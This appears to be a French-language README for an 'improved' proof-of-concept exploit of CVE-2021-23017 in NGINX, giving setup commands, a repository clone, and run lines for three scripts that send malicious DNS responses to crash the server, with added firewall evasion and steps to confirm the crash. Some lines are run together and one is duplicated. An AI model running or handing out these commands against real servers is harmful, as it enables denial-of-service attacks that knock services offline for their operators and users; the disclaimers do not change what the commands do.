
vulnérabilité dans les serveurs NGINX (versions 0.6.18–1.20.0). Les scripts visent à provoquer un déni de service (DoS) en envoyant des réponses DNS malveillantes, avec des améliorations pour contourner les pare-feux.
vulnérabilité dans les serveurs NGINX (versions 0.6.18–1.20.0). Les scripts visent à provoquer un déni de service (DoS) en envoyant des réponses DNS malveillantes, avec des améliorations pour contourner les pare-feux. Il s'agit d'une version améliorée du PoC original de M507/CVE-2021-23017-PoC.
Avertissement : Utilisez uniquement avec une autorisation écrite explicite du propriétaire du système. Les tests non autorisés sont illégaux.
sudo apt-get update
sudo apt-get install python3-scapy dnsmasq
pip3 install scapy requests
git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
cd EVIL-CVE-2021-23017-Update-2025
dnsmasq :
sudo nano /etc/dnsmasq.conf
address=/test.example.com/192.168.1.100
sudo systemctl start dnsmasq
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) pour faire planter le serveur NGINX.curl et dig pour exploiter la vulnérabilité.Comparé à M507/CVE-2021-23017-PoC :
poc1.2.3.py pour l'écoute simultanée, l'envoi DNS et le déclenchement de requêtes – vous devez exécuter les trois ensemble.Exécutez les trois ensemble avec les arguments appropriés (remplacez <target_ip>, <your_dns_server_ip>, <target_url>).
poc.pypython3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc2.pypython3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
poc3.py (Recommandé)python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100
Vérifiez l'état du serveur :
curl -I http://<target_url>
502 Bad Gateway ou 503 Service Unavailable indique un crash du serveur.200 OK suggère une absence de vulnérabilité ou un blocage par le pare-feu.Surveillez le trafic DNS :
sudo wireshark -f "udp port 53"
Avertissement : À des fins éducatives uniquement. Les auteurs ne sont pas responsables d'une mauvaise utilisation.